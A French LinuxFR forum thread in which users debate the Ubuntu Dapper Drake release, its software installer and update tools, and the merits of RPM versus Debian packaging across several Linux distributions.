        Le ajouter/enlever des programmes est déjà présent dans fedora core 5 ce n'est donc pas une innovation. Je ne pourrais pas etre affirmatif en ce qui concerne suse mais ca ne m'etonnerait pas non plus que ce raccourcis y soit aussi. Et puis cela dit en passant changer l'icone et le lien de synaptic (ou autre) vers ajouter/enlever des programmes, je ne pense pas que cela ait pris énormément de temps aux développeurs.
        • [^] # Re: Mon impression

          Posté par . Évalué à 1.

          La première fois que j'ai vu gnome-app-install, c'était une version préliminaire disponible dans hoary cf. http://www.gnomefr.org/capture/2.10/gnome-2.10-bersac1.png .

          Depuis, gnome-app-install a eu de nombreuse amélioration qui en font une méthode viable pour installer tout ses logiciels y compris les plugins flash et gstreamer. en cochant un case, en appliquant. Et la cerise sur le gateau, l'emplacement des nouvelles applications dans le menu est signalé par un popup !

          Donc non seulement Gnome à un menu bien plus simple que le menu démarer de Windows, mais en plus, on signale à l'utilisateur où est accessible la dernière appli installée. Bref, bien mieux qu'un telecharger.com !!!

          Car c'est bien face à cela que je me place !

          Y'en MARRE qu'on accuse les autres de surévaluer leur distro !
          • [^] # Re: Mon impression

            Posté par (page perso) . Évalué à 0.

            Y'en MARRE qu'on accuse les autres de surévaluer leur distro !


            bah c'est un peu^Wbeaucoup vrai, le petit truc que tu décris je l'ai vu y'a des plombes sous suse, pour ne citer qu'elle.

            Donc bon arrêtons le troll, quoi de neuf (vraiment nouveau) avec cette disitrib ?

            M.
            • [^] # Re: Mon impression

              Posté par (page perso) . Évalué à 3.

              Donc bon arrêtons le troll, quoi de neuf (vraiment nouveau) avec cette disitrib ?

              On peut utiliser une souris pour déplacer des fenêtres !
              • [^] # Re: Mon impression

                Posté par . Évalué à 5.

                Je crois que LA nouveauté de dapper drake c'est le nombre de trolls et de mécontents sur linuxfr, ils ont beaucoup travaillé et y'a pas à dire sur ce point les progrès sont flagrants.

                Bien sur les grincheux pourront faire remarquer que sur d'autres distibs aussi ça troll sec mais bon là la croissance est époustouflante.
        • [^] # Re: Mon impression

          Posté par . Évalué à 0.

          Et pour ta gouverne, le travail sur gnome-app-install n'a pas été seulement de créer un raccourcis. Une routine à été créer pour chercher tout les .desktop dans tout les dépôts, avec un blacklist, la suppression des doublons (d'Evolution notamment), et l'ajout de .desktop supplémentaire. L'ensemble des .desktop récupéré est ensuite fournit dans deux paquet différent : app-install-data pour le libre et app-install-commercial pour le reste.

          Évites d'être méprisant envers le travail des autres !
          • [^] # Re: Mon impression

            Posté par (page perso) . Évalué à -4.

            Évites d'être méprisant envers le travail des autres !

            pour moi c'est ce que fait Ubuntu avec debian depuis le début

            donc bon relativisons !

            M.
        • [^] # Re: Mon impression

          Posté par (page perso) . Évalué à 0.

          La seul différence est que celui de ubuntu est spécial gros boulet qui comprend rien, t'as une liste super simple des programmes gtk/qt avec des gros icones et une description. Manque plus que les traduction des descriptions de logiciel et cela sera parfait...

          Mais bon, le meme soft fonctionne tres bien sous debian, la preuve, la version kubuntu (adept) est développé par mornfall (ex kalyxo, actuellement ekhis)
          • [^] # Re: Mon impression

            Posté par . Évalué à 0.

            Manque plus que les traduction des descriptions de logiciel et cela sera parfait...

            La traduction est effectivement en cours sur Rosetta. Étant donné que la liste est considérable, elle ne sera disponible sans doute que pour Edgy Eft.
    • [^] # Re: Mon impression

      Posté par . Évalué à 1.

      Salut,

      Oui, pour Udevplug, j'ai essayer de montrer que ça venait surtout de choix en amont avec linux 2.6.15. C'est d'ailleur ce qui est expliqué dans les specs de dapper. J'ai d'ailleur signalé que Fedora et Mandriva avait (ou semblait avoir) une solution similaire. Je ne voulais pas laisser entendre qu'Ubuntu avait une nouveauté par rapport aux autre distribution, mais par rapport à ubunut 5.10 !

      Je ne parlait pas de synaptic mais de gnome-app-install qui est vraiment une merveille. OpenSuSE 10.1 semble avoir quelque chose de similiare, mais pas aussi abouti.

      Quant à gnome-power-manager. L'exemple que j'ai donner démontrait l'aisance de la configurabilité. Je n'ai pas induit que gnome-power-manager faisait le travail du noyau !!!

      Pour la poubelle, la différence d'Ubuntu est que dès warty, la poubelle n'était pas une icône sur le bureau, mais un applet dans le panneau qui rappelait un peu le dock de Mac OS X. Je parlais là de la configuration par défaut du bureau. Mandriva et SuSE ont aussi leur propre spécificité. Je pense notemment à l'unique panneau de SuSE sous Gnome alors que les Gnome ont souvent deux panneaux. Fedora Core 5 a encore gardé les icônes sur le bureau.

      Encore une fois, et j'espère que c'est ce qui sort de l'article. Je ne veux pas qu'on fasse d'Ubuntu la seule distribution qui a ceci cela. Fedora à de gros avantage notemment la virtualisation, AIGLX, un kernel plus récent, etc. Le seul truc unique à Ubuntu, c'est l'intégration à launchpad !

      C'est vrai que pas mal d'ubunteros ne voient que leur distribution et traitent les autres distros d'arriérée. Je me suis vraiment efforcé de décoller de cette image, alors s'il-te-plait, ne cherches pas trop à titiller :)

      Étienne.
      • [^] # Re: Mon impression

        Posté par . Évalué à -1.

        C'est vrai que pas mal d'ubunteros ne voient que leur distribution et traitent les autres distros d'arriérée. Je me suis vraiment efforcé de décoller de cette image, alors s'il-te-plait, ne cherches pas trop à titiller :)

        En l'occurence c'est l'impression que ça m'a donné en te lisant.

        Le seul truc unique à Ubuntu, c'est l'intégration à launchpad !

        Un peu normal non ? vu que launchpad est la propriété de canonical ltd ©
        • [^] # Re: Mon impression

          Posté par . Évalué à 3.

          > Le seul truc unique à Ubuntu, c'est l'intégration à launchpad !
          >
          > Un peu normal non ? vu que launchpad est la propriété de canonical ltd ©

          C'est bien ce que je veux dire ! Pourquoi cherche tu à lire dans mes commentaires du mépris envers les autres distributions !!!
          • [^] # Re: Mon impression

            Posté par . Évalué à 1.

            C'est le « ! » à la fin de ta phrase, ca m'a fait pensé que tu écrivais dans un état d'excitation incroyable due à l'annonce de cette nouvelle.

            Comme quoi la ponctuation est super importante en français ;-)
            • [^] # Re: Mon impression

              Posté par . Évalué à 0.

              Je ne suis pas un gaga d'ubuntu ! Doit-je rappeler que j'ai posté la news de Sarge[1] alors que j'était déjà passé à Ubuntu ! Pour moi Ubuntu ne remplacera pas Debian !

              Je te l'accorde, j'aurai du ajouter un « (sic) » à la fin de ma phrase pour lever toute ambiguïté.

              [1] http://linuxfr.org/2005/06/07/19078.html
      • [^] # Re: Mon impression

        Posté par . Évalué à 4.

        C'est vrai que pas mal d'ubunteros ne voient que leur distribution et traitent les autres distros d'arriérée.

        Je ne comprends pas pourquoi vous avez tous ici cette opinion sur les Ubunteros. Sur le forum francophone, je n'ai pas vu de troll contre les autres distros (hors windows, malgré les tentaives de calmer les esprits), il me semble même avoir vu plusieurs messages sur la qualité de la Suse. Sur linuxfr, je n'ai pas vu non plus de prosélytisme Ubuntu, quoiqu'en disent certains ici.
        Et jamais Ubuntu n'a dénigré le travail de Debian, au contraire sabdfl en a fait maintes fois l'éloge, sinon pourquoi se serait-il basé sur Debian pour réaliser Ubuntu.
        Apparement certains debianistes français (qui font des kicks sur le mot Ubuntu sur leur channel, belle ouverture d'esprit) et certains linuxferiens en veulent beaucoup à la communauté Ubunteros, et je n'en conçois pas les raisons, après tout on est dans le même bateau (linux et le libre), alors pourquoi se quereller entre nous sur le choix de la distrib ?
    • [^] # Re: Mon impression

      Posté par (page perso) . Évalué à 2.

      L'installation de nouveaux logiciels n'a jamais été aussi facile sur aucun autre système ! Des centaines de logiciels sont disponibles, supportés ou communautaires, libre ou commerciaux. L'installation et la mise-à-jour est géré automatiquement. L'interface d'installation est très agréable. Les linuxiens n'ont rien à envier aux Windowsiens et leur telechargez.com et consorts !

      Je trouve ce paragraphe un peu trop commercial à mon goût. Si tu parles de synaptic. Sâche qu'il n'est pas dispo que pour ubuntu, il a existé avant et il existera après.


      C'est à ce genre de détails qu'on distingue ceux qui ont déjà utilisé Ubuntu et ceux qui se basent sur les oui-dire parce qu'ils "n'aiment pas Ubuntu et pis c'est tout". Les utilisateurs d'Ubuntu n'utilisent synaptic qu'en second recours. Les principaux outils d'installation et de mise à jour des logiciels se nomment respectivement gnome-app-install et update-manager.

      Elle contient toujours l'applet poubelle si typique d'un bureau Ubuntu
      J'ai une icone poubelle sur mon bureau, je suis sur ubuntu ? non sous debian avec KDE, une icone ne fait pas la réputation d'une distribution. L'applet de poubelle se retrouve aussi dans Fedora core 5 il me semble. Ca n'a rien de spécifique à ubuntu.


      Même constat, même remarque. Pourtant, la première capture d'écran t'aurait permis de faire la différence entre l'icône de la Corbeille sur le bureau et l'applet qu'on installe dans une barre de tâches. Ah oui, c'est vrai: tu n'utilises pas Gnome...
      • [^] # Re: Mon impression

        Posté par (page perso) . Évalué à 0.

        a propos, lorsque j'utilisais cet applet, je confondais sdouvent l'entrée "enlever cet applet du panel" avec "vider la corbeille" ...
        bon, maintenant, j'utilise xfce avec thunar qui ne gère pas (encore ?) la corbeille mais supprime définitivement les dossiers.
    • [^] # Re: Mon impression

      Posté par (page perso) . Évalué à 0.

      Il est désormais aisé de suspendre son ordinateur lorsque l'écran est rabattu !

      Pour ça j'ai des doutes sérieux quand à la réelle influence de gnome-power-manager la dessus. Le fait que le suspend to {ram,disk} fonctionne vient plutôt du fait de l'utilisation du patch suspend2 directement intégré dans le kernel. Mais ce patch moi il me file la trouille en regardant comment ça fonctionne. Je suis curieux de savoir s'ils ont patcher le patch et fait remonter les améliorations upstream.


      quitte a dire des bétises :
      susp2 a été maintes fois refusé dans ubuntu parce que trop intrusif. les devs souhaitaient laisser ce choix au devs du kernel et donc susp2 ne sera jamais dans ubuntu. Par contre il ya eu un énorme travail sur acpi-support. Il suffit de comparer klaptopdaemon et kpowersave (l'un utilise le travail d'ubuntu et l'autre non) pour voir que acpi-support permet a de trés nombreuses machines d'utiliser les fonctions de veilles et d'hibernation sans qu'il y ait de rapport avec le noyau utilisé.
  • # Mise-à-jour depuis breezy

    Posté par . Évalué à 7.

    Salut à tous,

    À noter que update-manager à été mise-à-jour dans breezy afin qu'il puisse signaler la disponibilité de nouvelle version de la distribution. Un assistant se lance pour mettre à jour la distributions entièrement.

    On peut donc graphiquement passer d'une distribution à l'autre, sans éditer son source.list ni tapper de nom de code dans synaptic. Un vrai plus qui fera palir plus d'un utilisateur d'OS propriétaire.

    Évidement tout cela grâce à APT de debian, cela va sans-dire, mais il semble que c'est mieux avec !

    Étienne.
    • [^] # Re: Mise-à-jour depuis breezy

      Posté par . Évalué à 0.

      Évidement tout cela grâce à APT de debian, cela va sans-dire, mais il semble que c'est mieux avec !

      J'ai l'impression que tu as peur de debianeux intégristes. :)
      Mais sérieusement, tu es parmi les plus honnêtes des utilisateurs d'ubuntu.
    • [^] # Re: Mise-à-jour depuis breezy

      Posté par . Évalué à -5.

      integré dans les drakxtools derpuis belle lurette
  • # je rêve éveillé

    Posté par . Évalué à 0.

    "nous a fait rêvé", rêver ? :P
  • # Ah, ces méchants professionnels...

    Posté par . Évalué à 3.

    l'apport de la communauté manquant et l'appel à un professionnel utilisant ses solutions propriétaires a conduit à un thème incomplet et incohérent

    Ah ces méchants professionnels avec leurs solutions propriétaires... On lui avait pourtant dit qu'utiliser Photoshop mènerait à un résultat incomplet et incohérent. Si seulement il avait utilisé Gimp... :)
    • [^] # Re: Ah, ces méchants professionnels...

      Posté par (page perso) . Évalué à 0.

      exactement, ce commentaire m'a fait bondir. Pourquoi l'utilisation de logiciels proprios mèneraient à des thèmes incomplets et incohérents ? surtout sachant que presque tous les webdesigners utilisent le pack adobe ? les designers utilisant inkscape et gimp sont une minorité...
    • [^] # Re: Ah, ces méchants professionnels...

      Posté par (page perso) . Évalué à 3.

      incomplet et incoherent dans le sens ou le professionel est arrivé poru créer ses thèmes sans trop consulter l'equipe deja présente. Il a un peu fait ca dans son coin, donc difficile d'integrer le tout

      J'espère que tout cela ira bien mieux dans quelques semaines, ainsi que pour edgy eft
      • [^] # Re: Ah, ces méchants professionnels...

        Posté par . Évalué à 2.

        Je me doute bien que ce sont ces raisons qui ont donné le résultat incohérent. :)

        Ce qui me fait sourire, c'est l'auteur de l'article qui en profite pour glisser un petit « utilisant ses solutions propriétaires » dans une phrase qui au départ avait une connotation négative.
  • # Amis chasseurs...

    Posté par (page perso) . Évalué à 2.

    ...sortez vos fusils, la chasse est ouverte! ;)

    Sed fugit interea, fugit inreparabile tempus, singula dum capti circumvectamur amore

  • # Le triton? ~~° ?

    Posté par (page perso) . Évalué à -2.

    Va falloir trouver un nouveau ASCII pour le triton maintenant!?


    ~~° ?
  • # Petit coup de chapeau : installation parfaite sur un Vaio sz1m

    Posté par . Évalué à 1.

    Bravo à l'équipe d'Ubuntu pour le soin accordé aux détails et au confort de l'utilisateur.

    Dapper s'installe sans aucune modification nécessaire sur un Sony Vaio SZ1M, c'est à dire un portable dont le hardware a moins de 6 mois d'existence, à savoir :

    1) wifi ipw3945 out of the box (noyau patché, démon installé, ...), y compris en wpa
    2) acpi fonctionnel out of the box (autonomie de la batterie de 3h30 env., autant que sous Windows)
    3) sonypi patché out of the box (reconnaissance du chip intel ICH7)
    4) Video Firewire fonctionnelle (apt-get install kino, brancher le cable et voilà)
    5) disque dur SATA reconnu sans problème
    6) ethernet Marvell 88E8036
    7) NVidia Geforce 7400 (restricted drivers)
    8) Intel Core Duo T2300

    Merci à eux
    • [^] # Commentaire supprimé

      Posté par . Évalué à -1.

      Ce commentaire a été supprimé par l'équipe de modération.

      • [^] # Re: Petit coup de chapeau : installation parfaite sur un Vaio sz1m

        Posté par . Évalué à -1.

        Ah oui tiens c'est pour ca que j'ai pas debian sur mon portable mais ubuntu, le lecteur dvd est sata et du coup l'installeur debian le vois pas alors que le cd d'installe a bien demarre...

        s/debian/debian sarge/g
        • [^] # Commentaire supprimé

          Posté par . Évalué à 0.

          Ce commentaire a été supprimé par l'équipe de modération.

          • [^] # debian et sata

            Posté par . Évalué à -1.

            1/ Debian sarge c'est la distribution stable actuelle (j'ai fait la correction s/et/est/ pour essayer de comprendre);
            2/ Debian etch ou sid (déjà installables sans attendre 6mois)permettent d'utiliser le SATA dans les quelques pb connus pour sarge, d'où ma précision ;
            3/ Les accents ne sont pas gérés sur ton système ?
            • [^] # Re: debian et sata

              Posté par (page perso) . Évalué à 2.

              2/ Debian etch ou sid (déjà installables sans attendre 6mois)permettent d'utiliser le SATA dans les quelques pb connus pour sarge, d'où ma précision

              Oh oui, comme sarge qui devait voir le jour en décembre 2004 ? Résultat des courses, elle est sortie en Juin 2005, soit 6 mois après...
              L'intérêt principal d'Ubuntu, selon moi, c'est d'avoir une distribution relativement récente qui ne va trop bouger pendant 6 mois, histoire de pouvoir envisager de travailler avec, au boulot, dans ma bulle.
              Alors, oui, bien sûr qu'on peut installer une testing puis passer en sid derrière mais je n'ai pas le temps de chercher à comprendre pourquoi mon poste de travail refuse soudainement d'imprimer ou même que Xorg refuse de démarrer. Oui, je ne suis pas obligé de faire les mises à jour tout ça mais il y aura toujours un moment où l'une d'entre-elles sera la mise à jour de trop.
              Je suis prêt à aider le projet Debian, mais dans la vraie vie, je travaille pour une société et j'ai besoin d'outils de travail qui fonctionnent et on ne m'octroie pas le temps pour résoudre mes petits soucis. En fait, je suis payé pour résoudre ceux des autres qui n'ont pas plus le temps.
              Un cordonnier, en somme...
            • [^] # Commentaire supprimé

              Posté par . Évalué à -1.

              Ce commentaire a été supprimé par l'équipe de modération.

  • # Des liens pour udevplug

    Posté par (page perso) . Évalué à 2.

    Quelqu'un aurait des liens sur udevplug.

    J'ai googliser un peu mais pas grand chose ...

    Merci d'avance
  • # Bien satisfait

    Posté par . Évalué à 4.

    Je viens d'installer ubuntu pour voir ce que cela avait l'air suite aux différents commentaires lu ici, je n'ai pas de compétences en informatique mais je suis agréablement surpris de la simplicité d'Ubuntu, je crois que cette fois-ci est la bonne pour que je quitte le monde commercial vers le libre dans mon cas.
  • # passage a ubuntu

    Posté par . Évalué à -1.

    j'utilisais mandrake, puis je suis passé a debian, et un jour j'en ai eu raz le cul de debian et de ça non ouverture au desktop et du desinteret affirmer des developpeurs pour rendre la distrib plus agreable et utilisable par gui. Alors j'ai remis mandrake, qui m'a claqué dans les mains en quelque jours.
    J'adore apt-get face au rpm, et un jour un collegue de fac m'a dit qu'il y avait Ubuntu qui semble correspondre à la philosophie que je cherche.
    Je suis dessus depuis la Warty, j'ai passé mes pc et mes macs sur ubuntu du coup.

    Si Ubuntu à du succès c'est qu'elle répond à certaines attentes.
    Oui je sais c'est une évidence ^_^
    • [^] # Re: passage a ubuntu

      Posté par (page perso) . Évalué à 0.

      J'adore apt-get face au rpm


      C'est de la remarque qui date ça non ? L'enfer des dépendances entre rpm c'est à peu près fini depuis l'existence de urpmi, yum et consorts, non ?
      • [^] # Re: passage a ubuntu

        Posté par (page perso) . Évalué à 0.

        Debian ne doit pas son succès qu'au système APT seul.
        L'importante logithèque disponible grâce à ce système en est, à mon avis, aussi à l'origine, pour une grande partie.
        Car, là où il faut souvent récupérer des paquets RPM ci et là parce que la logithèque offerte par la distribution ne les fournit pas (rien qu'avec les modules Perl, pour l'exemple), sous Debian, ces logiciels sont déjà là et du coup, très facilement installable.
        Oui, c'est ça la vraie force du projet Debian: son importante logithèque.
        Bien qu'APT soit techniquement supérieur aux autres systèmes comme yum ou up2date, ils pâtissent surtout du format RPM qui s'appuie non pas sur des dépendances de paquets mais sur des fichiers. Même le port d'APT pour RPM n'a pas suffit à créer l'engouement qu'on en aurait attendu (et je suis le premier à le déplorer: utiliser APT quelque soit la distribution...).
        • [^] # Re: passage a ubuntu

          Posté par . Évalué à 1.

          Car, là où il faut souvent récupérer des paquets RPM ci et là parce que la logithèque offerte par la distribution ne les fournit pas (rien qu'avec les modules Perl, pour l'exemple

          Perl , c est vraiment un tres mauvais exemple , va voir un peu la quantité de modules perl "rpmisés" dans la mandriva , tu devrais être surpris .

          Bien qu'APT soit techniquement supérieur aux autres systèmes comme yum ou up2date, ils pâtissent surtout du format RPM qui s'appuie non pas sur des dépendances de paquets mais sur des fichiers.

          Oui mais non , rpm s'appuie a la fois sur les dependances de fichiers ET/OU de paquets.

          Enfin bref , c'est pas ni l'outil de résolution de dépendance des paquets que ce soit apt urpmi ou yum , ni le format de paquet choisi qui font la qualité et l'homogenéité d'une distribution mais la qualité des paquets , et la bonne intégration/cohérence avec tous les autres paquets.

          Debian prends certainement son temps pour sortir des distributions en revanche il est difficile de trouver une aussi bonne cohérence et homogeneité que dans une autre distrib , dire que ubuntu c est comme debian , donc la gestion de paquets est gainiale n y fera rien , si les packageurs/mainteneurs ubuntu font du boulot pas propre , ca fera une distro naze , et avec des releases tous les 6 mois je me demande bien ce que ca donne...
          • [^] # Re: passage a ubuntu

            Posté par (page perso) . Évalué à 0.

            Car, là où il faut souvent récupérer des paquets RPM ci et là parce que la logithèque offerte par la distribution ne les fournit pas (rien qu'avec les modules Perl, pour l'exemple

            Perl , c est vraiment un tres mauvais exemple , va voir un peu la quantité de modules perl "rpmisés" dans la mandriva , tu devrais être surpris .


            Désolé mais mes clients n'utilisent pas Mandrake/Mandriva mais RHEL (et la 3 en plus). Et ce qui leur importe, ce n'est pas que la majorité des modules Perl soit présents mais que leurs applications soient supportées sur tel ou tel système d'exploitation (en l'occurence, c'est souvent Oracle).

            Bien qu'APT soit techniquement supérieur aux autres systèmes comme yum ou up2date, ils pâtissent surtout du format RPM qui s'appuie non pas sur des dépendances de paquets mais sur des fichiers.

            Oui mais non , rpm s'appuie a la fois sur les dependances de fichiers ET/OU de paquets.

            Enfin bref , c'est pas ni l'outil de résolution de dépendance des paquets que ce soit apt urpmi ou yum , ni le format de paquet choisi qui font la qualité et l'homogenéité d'une distribution mais la qualité des paquets , et la bonne intégration/cohérence avec tous les autres paquets.


            Je suis d'accord sur ce point de vue, j'aurais dû le préciser quand je parlais de l'importante logithèque.

            Debian prends certainement son temps pour sortir des distributions en revanche il est difficile de trouver une aussi bonne cohérence et homogeneité que dans une autre distrib , dire que ubuntu c est comme debian , donc la gestion de paquets est gainiale n y fera rien , si les packageurs/mainteneurs ubuntu font du boulot pas propre , ca fera une distro naze , et avec des releases tous les 6 mois je me demande bien ce que ca donne...


            En tout cas, ça me procure un poste de travail relativement à jour et stable : excellent compromis à Debian unstable.
            • [^] # Re: passage a ubuntu

              Posté par (page perso) . Évalué à 0.

              Si tu parle de la RHEL et pas de la mandriva, dis le clairement...

              Parce que c'est quand même deux monde, la RHEL contient quasiment rien (pas de php/mysql par exemple), parce que tout le contenu est "supporté" par red hat...

              Quand au système de rpm, c'est en train de changer, la version 4.4.6 va supporter de nouvelles fonctionalités, telles que les dépendances optionnelles (je sais ça existe dans apt depuis longtemps).

              Les choses ont pas mal bougés depuis que tu a du tester une mandriva.

              Et au lieu de prendre une distribution qui contient rien (c'est ton choix), tu peux aussi prendre une distribution qui contient tout (mandriva/debian), prendre un support dessus (mandriva), ou faire toi-même (mandriva free/debian).

              Je compte plus le nombre de type qui passent sur #php pour demander comment installer mysql5 et php5, franchement si c'est pour se taper sois-même la maintenance de portions critique du système autant utiliser une distribution qui le fournit (centos/debian/mandriva/etc...)

              Et puis red hat et pas non plus super en avance sur les nouveautés, urpmi a eu une sacrée avance avant l'arrivée de yum (qui ne supporte pas encore tout ce que supporte urpmi par exemple).
              • [^] # Re: passage a ubuntu

                Posté par . Évalué à 2.

                la RHEL contient quasiment rien (pas de php/mysql par exemple)

                Faux, RHEL 4 incorpore mysql 4 et PHP 4, de plus un cd supplémentaire (en beta pour le moment) rajoute PHP5 et mysql5.

                C'est vrai que dans l'ensemble, RH est plutôt pauvre par rapport à des SuSE, Debian, Ubuntu, Mandriva, mais ce n'est pas non-plus le désert.

                Mais généralement, tu prends du RedHat pour avoir un environnement certifié pour telle ou telle application pro(fessionelle/priétaire), voir même pour des questions de support hardware. Si par exemple, tu installes Oracle sur Mandriva ou Debian, tu as la certitude qu'au premier problème, Oracle va te laisser tomber avec un classique "désolé, vous avez installé notre logiciel sur un OS non supporté...", et ce genre de comportements n'est pas rare...
              • [^] # Re: passage a ubuntu

                Posté par (page perso) . Évalué à -1.

                Si tu parle de la RHEL et pas de la mandriva, dis le clairement...

                Parce que c'est quand même deux monde, la RHEL contient quasiment rien (pas de php/mysql par exemple), parce que tout le contenu est "supporté" par red hat...


                Désolé mais si je n'ai pas mentionné "urpmi" mais au contraire "yum" et "up2date", c'est qu'à-priori, je ne parle pas de Mandriva...
                Il n'y a pas que Mandriva pour utiliser le format RPM, hein, loin de là.

                Parce que c'est quand même deux monde, la RHEL contient quasiment rien (pas de php/mysql par exemple), parce que tout le contenu est "supporté" par red hat...


                Je n'ai jamais parlé de PHP/MySQL, tu fais un mauvais procès.
                J'ai surtout parlé des modules Perl car c'est ce dont j'ai besoin.

                Quand au système de rpm, c'est en train de changer, la version 4.4.6 va supporter de nouvelles fonctionalités, telles que les dépendances optionnelles (je sais ça existe dans apt depuis longtemps).

                Les choses ont pas mal bougés depuis que tu a du tester une mandriva.

                Et au lieu de prendre une distribution qui contient rien (c'est ton choix), tu peux aussi prendre une distribution qui contient tout (mandriva/debian), prendre un support dessus (mandriva), ou faire toi-même (mandriva free/debian).


                J'ai gardé une mauvaise image de Mandrake mais je n'ai pas non plus toujours le choix des armes. La plupart des clients auxquels j'ai eu affaire utilisent RHEL, point. Quelques fois, j'ai le bonheur d'avoir des Debian, je n'ai pas eu l'occasion d'avoir de Mandrake/Mandriva.
                Et si j'avais le choix, je prendrais certainement Debian sauf s'il y a explicitement une question de support qui entre en jeu.

                Je compte plus le nombre de type qui passent sur #php pour demander comment installer mysql5 et php5, franchement si c'est pour se taper sois-même la maintenance de portions critique du système autant utiliser une distribution qui le fournit (centos/debian/mandriva/etc...)

                Et puis red hat et pas non plus super en avance sur les nouveautés, urpmi a eu une sacrée avance avant l'arrivée de yum (qui ne supporte pas encore tout ce que supporte urpmi par exemple).


                Que RedHat soit en avance ou non, je n'en ai cure. Quand on me l'impose, c'est jusqu'à présent du RHEL3 (!) parce qu'ils n'ont pas encore formalisé, testé ou prévu d'utiliser/migrer vers la RHEL4, pour te dire. Et pourtant, j'ai déjà des applications qui, sans nécessiter PHP5, demandent de plus en plus MySQL 4 (je ne parle même pas du 5). Or, RHEL3 est fournie avec MySQL 3.23...
                Oui, je sais que c'est une hérésie de devoir installer le paquet RPM fourni par MySQL AB mais va faire comprendre à certains clients qu'il faudrait passer à une version supérieure alors qu'en interne, ils ne l'ont pas encore intégré (je parle de leurs équipes d'administration).
                Pour en finir avec urpmi, ça ne vaut pas apt et je ne comprends pas pourquoi Mandrake a choisi de développer son propre outil au lieu de contribuer au projet apt-rpm...
                • [^] # Re: passage a ubuntu

                  Posté par (page perso) . Évalué à -1.

                  [quote]J'adore apt-get face au rpm[/quote]
                  Ca, c'est la phrase à laquelle je réagissais avant que tu ne réagisses à ma réaction.

                  Ca me semble clair : c'est le rpm en général qui est mis en cause. Tu ne peux donc pas simplement ignorer urpmi si tu veux que ta réponse soit "à propos".

                  Il me semble qu'urpmi est une preuve que le format rpm n'est pas intrinsèquement mauvais, et a peu à envier au .deb
                  • [^] # Re: passage a ubuntu

                    Posté par . Évalué à 2.

                    de toutes façons, apt-get et rpm ne sont pas dans la même catégorie...

                    rpm et dpkg sont comparables car ce sont des packages manager de bas niveau gérant l'inventaire et les liens des packages.

                    apt, yum et up2date sont des gestionnaires de haut niveau reposant sur une couche dpkg ou rpm (dans le cas d'apt, il peut reposer sur l'un ou l'autres).

                    Comparer apt et rpm, c'est comme comparer les jantes d'une voiture face aux pneus...
                    • [^] # Re: passage a ubuntu

                      Posté par (page perso) . Évalué à -2.

                      Hum, tu peux critiquer urpmi, mais je peux dire a propos qu'il est au point...

                      Et depuis la sortie de rpm 4.4.6, le format .deb n'a plus aucun avantage par rapport au format rpm qui supporte un sacré nombre de fonctions en plus.

                      Quand a urpmi, pour la mandriva 2007 il va y avoir un sacré nombre d'amélioration.
                      Notamment le dernier point noir : les fichiers monstrueux hdlist.cz vont disparaître au profit d'un nouveau système intelligent...

                      Et puis pour ce qui est de php/mysql, je saute quotidiennement chaque fois que je vois des admins qui viennent sur #php pour apprendre qu'il existe pas les paquets pour la version 5.

                      Parce que franchement la version 4 y a aucun support du modèle objet, une gestion des assignations par adresse minable, etc...

                      Quand a mysql5, rien que pour le support UTF-8 il est nécessaire...

                      Enfin, bon j'ai tendance a utiliser des versions récentes parce que j'ai pas de projets de très grosse envergure proprios...

                      Enfin mandriva risque de reprendre du terrain avec la 2007...
                      (en tout cas, mes dédiés sous debian vont dégager et être remplacé par elle)

                      pourquoi :
                      - debian, c'est bien, mais c'est elle est pas LSB (fichier de conf dans tous les sens)
                      - outils de conf pas dispo (bon on les utilise pas énormément sur des serveurs)
                      - patchset merdique et minimaliste (peu de fonctionalités par défaut)
                      - vielle
                      - problème de sécurité dernièrement <= c'est une des principales raison.
                      - 6mois pour faire des corrections de bugs dans des paquets critiques (bon ok, c'est pour start-stop-daemon dans dpkg, mais c'est pas possible en version finale)

                      Et tant qu'a devoir me gérer un pool de paquet corrigé pour des faille autant ne pas dupliquer ce boulot pour plusieurs distrib.

                      Ça pue le troll, mais étant sur cooker en ce moment, elle est vraiment plus facile a utiliser.

                      Quand au format deb, il a quand même un gros défaut :
                      - pas de src.rpm

                      Ui je sais apt-get source machin...

                      Mais pour avoir testé, il y a des problèmes dans tous les sens (par exemple le paquet php4 dois être "apt-get sourcé" a chaque fois car certains patchs ne peux être dé-appliqués)

                      L'approche src.rpm est je trouve beaucoup plus pratique, car :
                      - on télécharge un fichier unique (idem)
                      - on le met dans un répertoire
                      - on joue pas avec des outils "magique" comme fakeroot qui foirent
                      - on peux reprendre une compilation (pour pas se retaper tout le process quand on a un fichier qui merdent a la fin)
                      - signature dans le fichier rpm (pour le .deb c'est en dehors si mes souvenir sont bon)

                      Bon c'est subjectif sur certains point, mais vala ma vision des choses...
                      • [^] # Re: passage a ubuntu

                        Posté par . Évalué à 3.

                        Hum, tu peux critiquer urpmi, mais je peux dire a propos qu'il est au point...


                        Je n'ai pas critiqué Urpmi, je n'en ai pas parlé...

                        Dans le message précédent ta "réponse" (parcequ'en fait je ne vois pas trop le rapport entre ta réponse et mon message) je faisais allusion à la différence entre gestionnaire de paquets de haut niveau et de bas niveau et de la futilité de comparer rpm à apt, rpm étant comparable à dpkg et apt étant comparable à yum ou up2date. Rien de plus.

                        De toutes façons, le choix d'une distribution ne se limite pas à celui de son gestionnaire de paquets.

                        Parce que franchement la version 4 y a aucun support du modèle objet, une gestion des assignations par adresse minable, etc...
                        affirmation ayant à peu près le même degré d'objectivité que ton
                        la RHEL contient quasiment rien (pas de php/mysql par exemple), parce que tout le contenu est "supporté" par red hat...
                        ... ce sera quoi la prochaîne fois? "RedHat utilise encore le kernel 2.2" ?

                        Faut-il vraiment en arriver à raconter des bétises sur les concurrents pour valoriser Mandriva? Perso, je pense pas.
                      • [^] # Re: passage a ubuntu

                        Posté par (page perso) . Évalué à 2.

                        Et depuis la sortie de rpm 4.4.6, le format .deb n'a plus aucun avantage par rapport au format rpm qui supporte un sacré nombre de fonctions en plus.


                        Lesquelles ? Qu'est-ce qui manque au format .deb ou au couple apt/dpkg, selon toi ?

                        pourquoi :
                        - debian, c'est bien, mais c'est elle est pas LSB (fichier de conf dans tous les sens)


                        Dans tous les sens ? Pour autant que je sache, les fichiers de configuration sont situés sous /etc.

                        - outils de conf pas dispo (bon on les utilise pas énormément sur des serveurs)


                        Tu n'as jamais entendu parler de debconf ? Tu n'as jamais vraiment utilisé de debian alors parce que cet outil est vraiment trés pratique et il n'y a aucun équivalent dans les autres distributions.

                        - patchset merdique et minimaliste (peu de fonctionalités par défaut)


                        Pourrais-tu être plus précis ?

                        - vielle


